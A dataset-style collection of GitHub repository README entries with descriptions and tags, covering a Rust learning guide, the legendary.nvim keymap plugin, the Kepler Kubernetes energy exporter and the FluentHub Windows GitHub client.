lists](https://rust-unofficial.github.io/too-many-lists/index.html) minibook will have you building linked lists of all kinds and is quite good 3. 🤝 Asking for feedback is highly encouraged to get better at writing idiomatic, readable, and performant Rust. You can ask for feedback in [the Rust Subreddit](https://reddit.com/r/rust) or in [the Rust Programming Language Community Discord Server](https://discord.gg/rust-lang-community). 4. 📝 The 📚[Rust API Guidelines](https://rust-lang.github.io/api-guidelines/) for why things are the way they are. E.g. why `into`, and why the `_mut` postfix. For understanding the Rust-"isms" around you when reading people's code. 5. 🌱 You're now ready for 🏋️‍♀️[Rust by example](https://github.com/rust-lang/rust-by-example) and 🏋️‍♀️[Rust by practice](https://github.com/sunface/rust-by-practice) 6. ⏫ 📚[Rust patterns](https://rust-unofficial.github.io/patterns/intro.html) is a great intro to idioms in Rust 7. 🚀 Next, 📚[Zero to Production in Rust](https://www.zero2prod.com/) will give you some service-ish, production-ish use cases that will round off your experience 8. 🤔 When you feel curious about the "why's", pick up 📚[Rust for Rustaceans](https://nostarch.com/rust-rustaceans). Skim it and read what's interesting to you; cover-to-cover is a hard read unless you have the focus & time. From here, since everyone has their own taste, visit 📚[Rust Books](https://lborb.github.io/book/) from time to time to pick up a resource that you feel can move you forward to the next step. ## 📦 Starter libraries - save me from choosing 🤦‍♀️! _These are opinionated but popular choices. The goal is to avoid the [paradox of choice](https://en.wikipedia.org/wiki/The_Paradox_of_Choice) while learning._ * [anyhow](https://docs.rs/anyhow/latest/anyhow/) for error handling * [clap](https://docs.rs/clap/latest/clap/) for CLI building * [serde](https://serde.rs/) for serialization, including [serde_json](https://github.com/serde-rs/json) and [serde_yaml](https://github.com/dtolnay/serde-yaml) * [dialoguer](https://docs.rs/dialoguer/latest/dialoguer/) for CLI prompts and [console](https://crates.io/crates/console) for ANSI colors and handling * [env_logger](https://docs.rs/env_logger/latest/env_logger/) for logging and [log](https://docs.rs/log/latest/log/) for its facade * [lazy_static](https://docs.rs/lazy_static/latest/lazy_static/) for declaring static variables that have nontrivial initialization * [rayon](https://github.com/rayon-rs/rayon) for easy concurrency over data-, vector-, and array-based workloads * [reqwest](https://docs.rs/reqwest/latest/reqwest/) and [reqwest-middleware](https://crates.io/crates/reqwest-middleware) for HTTP calls * [actix-web](https://docs.rs/actix-web/latest/actix_web/) as a web/API server * [nom](https://crates.io/crates/nom) (parser combinators) or [pest](https://pest.rs/) (PEG) for building custom parsers * [insta](https://crates.io/crates/insta), [wiremock](https://crates.io/crates/wiremock), and [fake](https://crates.io/crates/fake) for testing * [tap](https://crates.io/crates/tap) for utility ## :ok_hand: Thinking in Rust _Hand-picked material to give you context, reasons, and history of how Rust evolved. Some of it is historical._ * [Rust Programming Techniques (youtube)](https://www.youtube.com/watch?v=vqavdUGKeb4) - a talk from 2018 which is more about "thinking in Rust", and will encourage using more Rust constructs. * [@jonhoo on Rust Trivia](https://github.com/rusty-ferris-club/jonhoo-rust-trivia) ([twitter: @jonhoo](https://twitter.com/jonhoo)) * [@jonhoo on Rust Keywords](https://github.com/rusty-ferris-club/jonhoo-rust-trivia/blob/main/keywords.md) ([twitter: @jonhoo](https://twitter.com/jonhoo)) * [Getting Started with Rust: Understanding Rust Compile Errors](https://www.youtube.com/watch?v=hgZQJys2zpY), and [part 2](https://www.youtube.com/watch?v=9391GxkYPyY) - A live session with Ryan Levick exploring and understanding compiler errors and the borrow checker ## 🥇 Gold Nuggets _Great articles, blogs, and videos on specific topics in Rust that are must-read or must-watch_ * [Error handling isn't all about errors](https://www.youtube.com/watch?v=rAF8mLI0naQ) - a talk from RustConf 2020, which gives a fantastic overview, breakdown, and ultimate tips for error handling and error libraries in Rust ## 💡 Project ideas _These are easy starter project ideas, not full-blown projects, just to get you up and running._ * `cat`, `grep`, `uniq`, `wc`, `find` + more. [in this repo](https://github.com/kyclark/command-line-rust) from the _Command line Rust_ book. -- `Practice` CLI, stdlib, data. `Difficulty` easy. * [A beefed-up calculator](https://crates.io/crates/eva) -- `Practice` CLI, parsing, data. `Difficulty` easy. * [SMTP protocol in Go, but implement it in Rust](https://notes.eatonphil.com/handling-email-from-gmail-smtp-protocol-basics.html), and build a simple TCP server from scratch -- `Practice` CLI, parsing, services. `Difficulty` easy * [CloudFormation parser](https://rtoch.com/posts/advanced-serde/). -- `Practice` CLI, serde, errors, data. `Difficulty` medium. * [Realworld](https://github.com/gothinkster/realworld) implementation in Rust. See [realworld-axum-sqlx](https://github.com/launchbadge/realworld-axum-sqlx). -- `Practice` Web, services, SQL, data. `Difficulty` medium. * [QR code generator](https://github.com/madprops/qool) -- `Practice` CLI, modules, data. `Difficulty` medium. * [Redis protocol parser (RESP)](https://redis.io/docs/reference/protocol-spec/) -- `Practice` parsing, TDD, creating Rust libraries, data. `Difficulty` medium. * [Add a lint to Clippy](https://github.com/rust-lang/rust-clippy/blob/master/doc/adding_lints.md). Clippy is the Rust linter, and you might be using it all day long. How about adding stuff to it? `Practice` real-world Rust, parsing, compilers. `Difficulty` hard. * [JSON log viewer, CLI](https://github.com/gistia/json-log-viewer) -- `Practice` CLI, TUI, modules, data, parsing. `Difficulty` hard. ## 🤘 Looking to work with other people _Find other people who are passionate and looking to build stuff in Rust for fun._ * [Rusty Ferris Club](https://github.com/rusty-ferris-club) builds tiny Rust-based open-source projects, and you can add your [ideas or requests](https://github.com/rusty-ferris-club/build-it-for-me-please) ## 🤾‍♂️ Hold on! I want to just play around before deciding to start _Some links to give you a feeling of Rust, if you're not ready to make the jump yet, or need some convincing to invest the time_ * Try the [tour of rust](https://tourofrust.com/index.html) * [A gentle intro to Rust](https://stevedonovan.github.io/rust-gentle-intro/readme.html) * [Take your first steps with Rust](https://docs.microsoft.com/en-us/learn/paths/rust-first-steps/) ## 💻 Cool stuff to have open in a tab while working _If you have multiple screens and like a fully immersive learning experience, you can keep these open at all times_ * [A big cheatsheet](https://www.cheats.rs/) or [a smaller cheatsheet](https://upsuper.github.io/rust-cheatsheet/) * A fun [syntax explorer explainer](https://jrvidal.github.io/explaine.rs/) * [awesome-rust](https://github.com/rust-unofficial/awesome-rust) and [are we there yet](https://wiki.mozilla.org/Areweyet) for when you're reaching out for a library or need inspiration ## 🚀 Releasing - [a CI/CD template for your project and crates](https://github.com/SpectralOps/rust-ci-release-template) to start with - [Documenting your crate](https://blog.guillaume-gomez.fr/articles/2020-03-12+Guide+on+how+to+write+documentation+for+a+Rust+crate) # Mental Bridges _These links will help bridge the mental model when you're coming from another language_ ## I'm a Node.js developer 1. Add [Rust for node developers](https://github.com/Mercateo/rust-for-node-developers) to your schedule, which is a soft intro just to get your bearings. ## I'm a Python developer 1. Check out [From Python into Rust](https://github.com/rochacbruno/py2rs) # Contributing Please feel free to submit PRs to improve this list. A few pointers: 1. The list must be concise 2. If there are new tracks, feel free to open them by adding a new subtitle to this README and submitting a PR (e.g. "Rust for game developers, how do I start?") Happy hacking!
Hand curated advice and pointers for getting started with Rust
rust,rust-lang
0
3
2
33
0
1
0
mrjones2014/legendary.nvim
<div align="center"> # `legendary.nvim` [Features](#features) | [Prerequisites](#prerequisites) | [Installation](#installation) | [Quickstart](#quickstart) | [Configuration](#configuration) </div> Define your keymaps, commands, and autocommands as simple Lua tables, building a legend at the same time (like VS Code's Command Palette). ![demo gif](https://user-images.githubusercontent.com/8648891/200827633-7009f5f3-e126-491c-88bd-73a0287978c4.gif) \ <sup>Theme used in recording is [onedarkpro.nvim](https://github.com/olimorris/onedarkpro.nvim). The finder UI is handled by [telescope.nvim](https://github.com/nvim-telescope/telescope.nvim) via [dressing.nvim](https://github.com/stevearc/dressing.nvim). See [Prerequisites](#prerequisites) for details.</sup> **Table of Contents** - [Features](#features) - [Prerequisites](#prerequisites) - [Installation](#installation) - [Quickstart](#quickstart) - [Configuration](#configuration) - [Troubleshooting Frecency Sort](#troubleshooting-frecency-sort) - [Keymap Development Utilities](./doc/MAPPING_DEVELOPMENT.md) - [Lua API](./doc/API.md) - [Extensions](./doc/EXTENSIONS.md) - [Table Structures](./doc/table_structures/README.md) - [Keymaps](./doc/table_structures/KEYMAPS.md) - [Commands](./doc/table_structures/COMMANDS.md) - [Functions](./doc/table_structures/FUNCTIONS.md) - [`augroup`/`autocmd`s](./doc/table_structures/AUTOCMDS.md) ## Features - Define your keymaps, commands, `augroup`/`autocmd`s, and even arbitrary Lua functions to run on the fly, as simple Lua tables, then bind them with `legendary.nvim` - Integration with [which-key.nvim](https://github.com/folke/which-key.nvim), use your existing `which-key.nvim` tables with `legendary.nvim` (see [extensions](./doc/EXTENSIONS.md#which-keynvim)) - Integration with [lazy.nvim](https://github.com/folke/lazy.nvim), automatically load keymaps defined via `lazy.nvim`'s `keys` property on plugin specs (see [extensions](./doc/EXTENSIONS.md#lazynvim)) - Execute normal, insert, and visual mode keymaps, commands, autocommands, and Lua functions when you select them - Show your most recently executed items at the top when triggered via `legendary.nvim` (can be disabled via config) - Uses `vim.ui.select()` so it can be hooked up to a fuzzy finder using something like [dressing.nvim](https://github.com/stevearc/dressing.nvim) for a VS Code command palette like interface - Buffer-local keymaps, commands, functions and autocmds only appear in the finder for the current buffer - Help execute commands that take arguments by prefilling the command line instead of executing immediately - Search built-in keymaps and commands along with your user-defined keymaps and commands (may be disabled in config). Notice some missing? Comment on [this discussion](https://github.com/mrjones2014/legendary.nvim/discussions/89) or submit a PR! - A `legendary.toolbox` module to help create lazily-evaluated keymaps and commands, and item filter. Have an idea for a new helper? Comment on [this discussion](https://github.com/mrjones2014/legendary.nvim/discussions/90) or submit a PR! - Sort by [frecency](https://en.wikipedia.org/wiki/Frecency), a combined measure of how frequently and how recently you've used an item from the picker - A parser to convert Vimscript keymap commands (e.g. 
`vnoremap <silent> <leader>f :SomeCommand<CR>`) to `legendary.nvim` keymap tables (see [Converting Keymaps From Vimscript](./doc/API.md#converting-keymaps-from-vimscript)) - Anonymous mappings; show mappings/commands in the finder without having `legendary.nvim` handle creating them - Extensions to automatically load keymaps and commands from other plugins ## Prerequisites - (Optional) A `vim.ui.select()` handler; this provides the UI for the finder. - I recommend [telescope.nvim](https://github.com/nvim-telescope/telescope.nvim) paired with [dressing.nvim](https://github.com/stevearc/dressing.nvim). ## Installation This project uses git tags to adhere to [Semantic Versioning](https://semver.org/). To check the latest version, see the [git tag list](https://github.com/mrjones2014/legendary.nvim/tags). With `lazy.nvim`: ```lua -- to use a version { 'mrjones2014/legendary.nvim', version = 'v2.13.9', -- since legendary.nvim handles all your keymaps/commands, -- it's recommended to load legendary.nvim before other plugins priority = 10000, lazy = false, -- sqlite is only needed if you want to use frecency sorting -- dependencies = { 'kkharji/sqlite.lua' } } -- or, to get rolling updates { 'mrjones2014/legendary.nvim', -- since legendary.nvim handles all your keymaps/commands, -- it's recommended to load legendary.nvim before other plugins priority = 10000, lazy = false, -- sqlite is only needed if you want to use frecency sorting -- dependencies = { 'kkharji/sqlite.lua' } } ``` With `vim-plug`: ```VimL " if you want to use frecency sorting, sqlite is also needed Plug "kkharji/sqlite.lua" " to use a version Plug "mrjones2014/legendary.nvim", { 'tag': 'v2.1.0' } " or, to get rolling updates Plug "mrjones2014/legendary.nvim" ``` ## Quickstart If you use [lazy.nvim](https://github.com/folke/lazy.nvim) for your plugin manager, `legendary.nvim` can automatically register keymaps defined via the `keys` property of `lazy.nvim` plugin specs. This lets you keep your plugin-specific keymaps where you define the plugin, and `legendary.nvim` automatically detects them.
For example: ```lua -- in a plugin spec: { 'folke/flash.nvim', keys = { { 's', function() require('flash').jump() end, mode = { 'n', 'x', 'o' }, desc = 'Jump forwards', }, { 'S', function() require('flash').jump({ search = { forward = false } }) end, mode = { 'n', 'x', 'o' }, desc = 'Jump backwards', }, }, } -- where you set up legendary.nvim -- now the keymaps from the `flash.nvim` plugin spec will be automatically loaded require('legendary').setup({ extensions = { lazy_nvim = true } }) ``` Otherwise, register keymaps, commands, autocmds, and functions through setup, including opting into _extensions_ which can automatically load keymaps and commands from other plugins: ```lua require('legendary').setup({ keymaps = { -- map keys to a command { '<leader>ff', ':Telescope find_files', description = 'Find files' }, -- map keys to a function { '<leader>h', function() print('hello world!') end, description = 'Say hello', }, -- Set options used during keymap creation { '<leader>s', ':SomeCommand<CR>', description = 'Silent keymap', opts = { silent = true } }, -- create keymaps with different implementations per-mode { '<leader>c', { n = ':LinewiseCommentToggle<CR>', x = ":'<,'>BlockwiseCommentToggle<CR>" }, description = 'Toggle comment', }, -- create item groups to create sub-menus in the finder -- note that only keymaps, commands, and functions -- can be added to item groups { -- groups with same itemgroup will be merged itemgroup = 'short ID', description = 'A submenu of items...', icon = '', keymaps = { -- more keymaps here }, }, -- in-place filters, see :h legendary-tables or ./doc/table_structures/README.md { '<leader>m', description = 'Preview markdown', filters = { ft = 'markdown' } }, }, commands = { -- easily create user commands { ':SayHello', function() print('hello world!') end, description = 'Say hello as a command', }, { -- groups with same itemgroup will be merged itemgroup = 'short ID', -- don't need to copy the other group data because -- it will be merged with the one from the keymaps table commands = { -- more commands here }, }, -- in-place filters, see :h legendary-tables or ./doc/table_structures/README.md { ':Glow', description = 'Preview markdown', filters = { ft = 'markdown' } }, }, funcs = { -- Make arbitrary Lua functions that can be executed via the item finder { function() doSomeStuff() end, description = 'Do some stuff with a Lua function!', }, { -- groups with same itemgroup will be merged itemgroup = 'short ID', -- don't need to copy the other group data because -- it will be merged with the one from the keymaps table funcs = { -- more funcs here }, }, }, autocmds = { -- Create autocmds and augroups { 'BufWritePre', vim.lsp.buf.format, description = 'Format on save' }, { name = 'MyAugroup', clear = true, -- autocmds here }, }, -- load extensions extensions = { -- automatically load keymaps from lazy.nvim's `keys` option lazy_nvim = true, -- load keymaps and commands from nvim-tree.lua nvim_tree = true, -- load commands from smart-splits.nvim -- and create keymaps, see :h legendary-extensions-smart-splits.nvim smart_splits = { directions = { 'h', 'j', 'k', 'l' }, mods = { move = '<C>', resize = '<M>', }, }, -- load commands from op.nvim op_nvim = true, -- load keymaps from diffview.nvim diffview = true, }, }) ``` For more mapping features and more complicated setups see [Table Structures](./doc/table_structures/README.md).
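As a quick illustration before the command list below, here is a minimal sketch (assumed usage, not taken from the official docs) of binding a key that opens the finder through the `require('legendary').find()` API described in the Lua API section:

```lua
-- a minimal sketch (assumed usage): open the legendary.nvim finder
-- from a normal-mode keymap; find() also accepts an opts table,
-- which is documented below
vim.keymap.set('n', '<leader>l', function()
  require('legendary').find()
end, { desc = 'Open legendary.nvim finder' })
```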
To trigger the finder for your configured keymaps, commands, `augroup`/`autocmd`s, and Lua functions: Commands: ```VimL " search keymaps, commands, and autocmds :Legendary " search keymaps :Legendary keymaps " search commands :Legendary commands " search functions :Legendary functions " search autocmds :Legendary autocmds " repeat the last item executed via legendary.nvim's finder; " by default, only executes if the last set of item filters used still returns `true` :LegendaryRepeat " repeat the last item executed via legendary.nvim's finder, ignoring the filters used :LegendaryRepeat! ``` Lua API: The `require('legendary').find()` function takes an `opts` table with the following fields (all optional): ```lua { -- pass a list of filter functions or a single filter function with -- the signature `function(item, context): boolean` -- (see below for `context` definition) -- several filter functions are provided for convenience -- see ./doc/FILTERS.md for a list filters = {}, -- pass a function with the signature `function(item, mode): string[]` -- returning a list of strings where each string is one column -- use this to override the configured formatter for just one call formatter = nil, -- pass a string, or a function that returns a string -- to customize the select prompt for the current call select_prompt = nil, } ``` The `context` table passed to filters contains the following properties: ```lua { buf = number, -- buffer ID buftype = string, filetype = string, mode = string, -- the mode that the UI was triggered from cursor_pos = table, -- { row, col } marks = table, -- visual mode marks, if applicable; { line, col, line, col } } ``` See [USAGE_EXAMPLES.md](./doc/USAGE_EXAMPLES.md) for some advanced usage examples. ## Configuration Default configuration is shown below. For a detailed explanation of the structure for keymap, command, and `augroup`/`autocmd` tables, see [doc/table_structures/README.md](./doc/table_structures/README.md). ```lua require('legendary').setup({ -- Initial keymaps to bind, can also be a function that returns the list keymaps = {}, -- Initial commands to bind, can also be a function that returns the list commands = {}, -- Initial augroups/autocmds to bind, can also be a function that returns the list autocmds = {}, -- Initial functions to bind, can also be a function that returns the list funcs = {}, -- Initial item groups to bind, -- note that item groups can also -- be under keymaps, commands, autocmds, or funcs; -- can also be a function that returns the list itemgroups = {}, -- default opts to merge with the `opts` table -- of each individual item default_opts = { -- for example, { silent = true, remap = false } keymaps = {}, -- for example, { args = '?', bang = true } commands = {}, -- for example, { buf = 0, once = true } autocmds = {}, }, -- Customize the prompt that appears on your vim.ui.select() handler -- Can be a string or a function that returns a string. select_prompt = '๎ช† legendary.nvim ๎ช†', -- Character to use to separate columns in the UI col_separator_char = 'โ”‚', -- Optionally pass a custom formatter function. This function -- receives the item as a parameter and the mode that legendary -- was triggered from (e.g. `function(item, mode): string[]`) -- and must return a table of non-nil string values for display. -- It must return the same number of values for each item to work correctly. -- The values will be used as column values when formatted. 
-- See function `default_format(item)` in -- `lua/legendary/ui/format.lua` to see default implementation. default_item_formatter = nil, -- Customize icons used by the default item formatter icons = { -- keymap items list the modes in which the keymap applies -- by default, you can show an icon instead by setting this to -- a non-nil icon keymap = nil, command = '', fn = '󰡱', itemgroup = '', }, -- Include builtins by default, set to false to disable include_builtin = true, -- Include the commands that legendary.nvim creates itself -- in the legend by default, set to false to disable include_legendary_cmds = true, -- Options for list sorting. Note that fuzzy-finders will still -- do their own sorting. For telescope.nvim, you can set it to use -- `require('telescope.sorters').fuzzy_with_index_bias({})` when -- triggered via `legendary.nvim`. Example config for `dressing.nvim`: -- -- require('dressing').setup({ -- select = { -- get_config = function(opts) -- if opts.kind == 'legendary.nvim' then -- return { -- telescope = { -- sorter = require('telescope.sorters').fuzzy_with_index_bias({}) -- } -- } -- else -- return {} -- end -- end -- } -- }) sort = { -- put most recently selected item first, this works -- both within global and item group lists most_recent_first = true, -- sort user-defined items before built-in items user_items_first = true, -- sort the specified item type before other item types, -- value must be one of: 'keymap', 'command', 'autocmd', 'group', nil item_type_bias = nil, -- settings for frecency sorting. -- https://en.wikipedia.org/wiki/Frecency -- Set `frecency = false` to disable. -- this feature requires sqlite.lua (https://github.com/kkharji/sqlite.lua) -- and will be automatically disabled if sqlite is not available. -- NOTE: THIS TAKES PRECEDENCE OVER OTHER SORT OPTIONS! frecency = { -- the directory to store the database in db_root = string.format('%s/legendary/', vim.fn.stdpath('data')), -- the maximum number of timestamps for a single item -- to store in the database max_timestamps = 10, }, }, lazy_nvim = { -- Automatically register keymaps that are defined on lazy.nvim plugin specs -- using the `keys = {}` property. auto_register = false, }, which_key = { -- Automatically add which-key tables to legendary -- see ./doc/WHICH_KEY.md for more details auto_register = false, -- you can put which-key.nvim tables here, -- or alternatively have them auto-register, -- see ./doc/WHICH_KEY.md mappings = {}, opts = {}, -- controls whether legendary.nvim actually binds the keymaps, -- or if you want to let which-key.nvim handle the bindings. -- if not passed, true by default do_binding = true, -- controls whether to use legendary.nvim item groups -- matching your which-key.nvim groups; if false, all keymaps -- are added at toplevel instead of in a group. use_groups = true, }, -- Which extensions to load; no extensions are loaded by default. -- Setting the plugin name to `false` disables loading the extension. -- Setting it to any other value will attempt to load the extension, -- and pass the value as an argument to the extension, which should -- be a single function. Extensions are modules under `legendary.extensions.*` -- which return a single function, which is responsible for loading and -- initializing the extension.
extensions = { nvim_tree = false, smart_splits = false, op_nvim = false, diffview = false, }, scratchpad = { -- How to open the scratchpad buffer, -- 'current' for current window, 'float' -- for floating window view = 'float', -- How to show the results of evaluated Lua code. -- 'print' for `print(result)`, 'float' for a floating window. results_view = 'float', -- Border style for floating windows related to the scratchpad float_border = 'rounded', -- Whether to restore scratchpad contents from a cache file keep_contents = true, }, -- Directory used for caches cache_path = string.format('%s/legendary/', vim.fn.stdpath('cache')), -- Log level, one of 'trace', 'debug', 'info', 'warn', 'error', 'fatal' log_level = 'info', }) ``` ### Troubleshooting Frecency Sort If you get an error along the lines of the following, and frecency sorting does not work: ``` Failed to open database at /Users/mat/.local/share/nvim/legendary/legendary_frecency.sqlite3: ...at/.local/share/nvim/lazy/sqlite.lua/lua/sqlite/defs.lua:56: dlopen(lib.dylib, 0x0005): tried: 'lib.dylib' (no such file), '/System/Volumes/Preboot/Cryptexes/OSlib.dylib' (no such file), '/nix/store/092zx4zf4fmj0jyk32jl1ihix6q4bmw4-apple-framework-CoreFoundation-11.0.0/Library/Frameworks/lib.dylib' (no such file), '/System/Volumes/Preboot/Cryptexes/OS/nix/store/092zx4zf4fmj0jyk32jl1ihix6q4bmw4-apple-framework-CoreFoundation-11.0.0/Library/Frameworks/lib.dylib' (no such file), '/nix/store/092zx4zf4fmj0jyk32jl1ihix6q4bmw4-apple-framework-CoreFoundation-11.0.0/Library/Frameworks/lib.dylib' (no such file), '/System/Volumes/Preboot/Cryptexes/OS/nix/store/092zx4zf4fmj0jyk32jl1ihix6q4bmw4-apple-framework-CoreFoundation-11.0.0/Library/Frameworks/lib.dylib' (no such file), '/usr/lib/lib.dylib' (no such file, not in dyld cache), 'lib.dylib' (no such file), '/usr/local/lib/lib.dylib' (no such file), '/usr/lib/lib.dylib' (no such file, not in dyld cache) ``` This means that the `sqlite.lua` Lua library was unable to find the `libsqlite3.dylib` shared library file. This could be the case for a few reasons. To fix this, you can either set `vim.g.sqlite_clib_path` in your Neovim config, or the `LIBSQLITE` environment variable to the full path to `libsqlite3.dylib`. If you are using Nix with `home-manager`, this can be done like so: ```nix { home.sessionVariables = { LIBSQLITE = "${pkgs.sqlite.out}/lib/libsqlite3.dylib"; }; } ``` If you are _not_ using Nix, you can locate the `libsqlite3.dylib` on macOS by running: ```shell otool -L $(which sqlite3) | grep "sqlite3.dylib" ``` --- Additional documentation can be found under [doc/](./doc/).
๐Ÿ—บ๏ธ A legend for your keymaps, commands, and autocmds, integrates with which-key.nvim, lazy.nvim, and more.
neovim,neovim-plugin,keymap,neovim-ui,legend,keymapping,keybindings,vim-commands,which-key,nvim
37
13
269
973
9
1
5
openai/dalle-2-preview
null
null
null
0
56
7
7
21
1
0
sustainable-computing-io/kepler
<img align="right" width="250px" src="https://user-images.githubusercontent.com/17484350/138557170-d8079b94-a517-4366-ade8-8d473e3f3f1d.jpg"> ![GitHub Workflow Status (event)](https://img.shields.io/github/actions/workflow/status/sustainable-computing-io/kepler/unit_test.yml?branch=main&label=CI) [![codecov](https://codecov.io/gh/sustainable-computing-io/kepler/graph/badge.svg?token=K9BDX9M86E)](https://codecov.io/gh/sustainable-computing-io/kepler) [![OpenSSF Best Practices](https://bestpractices.coreinfrastructure.org/projects/7391/badge)](https://bestpractices.coreinfrastructure.org/projects/7391)[![OpenSSF Scorecard](https://api.securityscorecards.dev/projects/github.com/sustainable-computing-io/kepler/badge)](https://securityscorecards.dev/viewer/?uri=github.com/sustainable-computing-io/kepler) <!-- [![GoDoc](https://godoc.org/github.com/kubernetes/kube-state-metrics?status.svg)](https://godoc.org/github.com/kubernetes/kube-state-metrics) --> [![License][apache2-badge]][apache2-url] [![License][bsd2-badge]][bsd2-url] [![License][gpl-badge]][gpl-url] [![Twitter URL](https://img.shields.io/twitter/url/https/twitter.com/KeplerProject.svg?style=social&label=Follow%20%40KeplerProject)](https://twitter.com/KeplerProject) [apache2-badge]: https://img.shields.io/badge/License-Apache%202.0-blue.svg [apache2-url]: https://opensource.org/licenses/Apache-2.0 [bsd2-badge]: https://img.shields.io/badge/License-BSD%202--Clause-orange.svg [bsd2-url]: https://opensource.org/licenses/BSD-2-Clause [gpl-badge]: https://img.shields.io/badge/License-GPL%20v2-blue.svg [gpl-url]: https://opensource.org/licenses/GPL-2.0 # Kepler Kepler (Kubernetes Efficient Power Level Exporter) uses eBPF to probe energy-related system stats and exports them as Prometheus metrics. As a CNCF Sandbox project, Kepler follows the [CNCF Code of Conduct](https://github.com/cncf/foundation/blob/main/code-of-conduct.md). ## Architecture Kepler Exporter exposes a variety of [metrics](https://sustainable-computing.io/design/metrics/) about the energy consumption of Kubernetes components such as Pods and Nodes. ![Architecture](doc/kepler-arch.png) ## Install Kepler Instructions to install Kepler can be found in the [Kepler docs](https://sustainable-computing.io/installation/kepler/). ## Visualise Kepler metrics with Grafana To visualise the power consumption metrics made available by the Kepler Exporter, import the pre-generated [Kepler Dashboard](grafana-dashboards/Kepler-Exporter.json) into Grafana: ![Sample Grafana dashboard](doc/dashboard.png) ## Contribute to Kepler Interested in contributing to Kepler? Follow the [Contributing Guide](CONTRIBUTING.md) to get started! ## Talks & Demos - [Kepler Demo](https://www.youtube.com/watch?v=P5weULiBl60) - ["Sustainability the Container Native Way" - Open Source Summit NA 2022](doc/OSS-NA22.pdf) A full list of talks and demos about Kepler can be found [here](https://github.com/sustainable-computing-io/kepler-doc/tree/main/demos). ## Community Meetings Please join the biweekly community meetings. The meeting calendar and agenda can be found [here](https://github.com/sustainable-computing-io/community/blob/main/community-event.md) ## License With the exception of eBPF code, everything is distributed under the terms of the [Apache License (version 2.0)]. ### eBPF All eBPF code is distributed under either: - The terms of the [GNU General Public License, Version 2] or the [BSD 2 Clause license], at your option. - The terms of the [GNU General Public License, Version 2].
The exact license text varies by file. Please see the SPDX-License-Identifier header in each file for details. Files that originate from the authors of Kepler use (GPL-2.0-only OR BSD-2-Clause). Files generated from the Linux kernel, i.e. `vmlinux.h`, use GPL-2.0-only. Unless you explicitly state otherwise, any contribution intentionally submitted for inclusion in this project by you, as defined in the GPL-2 license, shall be dual licensed as above, without any additional terms or conditions. [Apache License (version 2.0)]: LICENSE-APACHE [BSD 2 Clause license]: LICENSE-BSD-2 [GNU General Public License, Version 2]: LICENSE-GPL-2
Kepler (Kubernetes-based Efficient Power Level Exporter) uses eBPF to probe performance counters and other system stats, use ML models to estimate workload energy consumption based on these stats, and exports them as Prometheus metrics
kubernetes,sustainability,ebpf,prometheus-exporter,energy-consumption,energy-monitor,energy-efficiency,prometheus,cloud-native,machine-learning
32
50
1,029
2,242
64
33
21
0x5bfa/FluentHub
<p align="center"> <img width="128" align="center" src="assets/fluenthub.png" /> </p> <h1 align="center"> FluentHub </h1> <p align="center"> <a title="Microsoft Store" target="_blank" href="https://apps.microsoft.com/store/detail/fluenthub/9nkb9hx8rjz3"> <img width="220" align="center" src="https://get.microsoft.com/images/en-us%20dark.svg" /></a> </p> FluentHub is the stylish yet powerful GitHub client for Windows, which empowers the development experience and follows the Microsoft Design Language. - **Modern UI:** designed with Fluent Design and built on WinAppSdk/WinUI - **Multitasking:** multitask with tabs; you can switch tabs without losing data - **Powerful page navigation:** navigation works like a browser's, without losing navigation history - **Mutation:** perform any kind of modification on GitHub; the app supports everything the GitHub API supports ## 🎁 Getting started with FluentHub You must be running Windows 10 or 11 to use FluentHub ### Via Microsoft Store This is the preferred installation method. It allows you to always be on the latest version when we release new builds via automatic updates. ### Via GitHub Released builds can be manually downloaded from this [repository's releases page](https://github.com/FluentHub/FluentHub/releases). Download the `FluentHub_<versionNumber>.msixbundle` file from the `Assets` section. In order to install the app, you can simply double-click on the .msixbundle file, and the app installer should automatically run. If that fails for any reason, you can try the following command with a PowerShell prompt: ```powershell # NOTE: If you are using PowerShell 7+, please run # Import-Module Appx -UseWindowsPowerShell # before using Add-AppxPackage. Add-AppxPackage FluentHub_<versionNumber>.msixbundle ``` ## Screenshots **Home page** ![image](https://github.com/0x5bfa/FluentHub/assets/62196528/a31bdace-8700-4a6a-83e9-1cdc52955c4f) **PR page** ![image](https://github.com/0x5bfa/FluentHub/assets/62196528/a29c4ef8-1fe5-47c3-be03-6afebe02c55b) **User profile page** ![image](https://github.com/0x5bfa/FluentHub/assets/62196528/35ffbe36-00d3-4d04-9019-67307febfc95) ## Building the Code ### Requirements - Windows 10 (Build 10.0.19041.0) or newer with Developer Mode enabled in the Windows Settings - [Git](https://git-scm.com/) - [Visual Studio 2022](https://visualstudio.microsoft.com/vs/): - [Windows SDK (version 10.0.22621.0)](https://developer.microsoft.com/en-us/windows/downloads/windows-sdk/) - .NET 7 SDK (check the box named .NET Desktop Development) - Windows App SDK ### 1. Clone the repository ```git git clone https://github.com/FluentHub/FluentHub ``` ### 2. Prepare OAuth credentials See [the documentation](docs/credentials.md). > [!IMPORTANT] > If you skip this step, Visual Studio will give a fatal error that the `AppCredentials.config` file does not exist. ### 3. Build the project - Open `FluentHub.sln`. - Hit 'Set as Startup item' on `FluentHub.Package` in the Solution Explorer. - Build with `Debug`, `x64`, `FluentHub.Package`. ## Contributing There are multiple ways to participate in the community: - [Submit bugs and feature requests](https://github.com/FluentHub/FluentHub/issues/new/choose).
- Review [the documentation](docs/code-style.md) and make pull requests for anything from typos to new ideas - Review source code changes If you are interested in fixing issues and contributing directly to the code base, please refer to the [documentation](docs/), which covers the following: - [How to build and run from source](docs/) - The development workflow, including debugging and running tests - Coding guidelines - [Submitting pull requests](https://github.com/FluentHub/FluentHub/pulls) - [Finding an issue to work on](https://github.com/FluentHub/FluentHub/issues/) - [Contributing to translations on Crowdin](https://crowdin.com/project/fluenthub) <a href="https://crowdin.com/project/fluenthub" rel="nofollow"> <img style="width:140;height:40" src="https://badges.crowdin.net/badge/dark/crowdin-on-light.png" /></a> ## Feedback - [Request a new feature](https://github.com/FluentHub/FluentHub/pulls) - Upvote popular feature requests - [File an issue](https://github.com/FluentHub/FluentHub/issues/new/choose) - Join [our Discord](https://discord.gg/8KtRkjq2Q4) and let us know what you think [![](https://dcbadge.vercel.app/api/server/8KtRkjq2Q4?style=flat)](https://discord.gg/8KtRkjq2Q4) ## Credit - Some application icons were created by [Icons8](https://github.com/icons8). - Many thanks to [Joseph Beattie](https://github.com/josephbeattie) for creating our current logo. ![Alt](https://repobeats.axiom.co/api/embed/15ef16427b681d911523e65d60d88a838c9d4fc3.svg "Repobeats analytics image")
The best, stylish yet powerful GitHub client for Windows.
github,uwp,graphql,client,developer-tools,csharp,xaml,fluent,github-api,mica
19
20
299
572
17
1
1
charmbracelet/wishlist
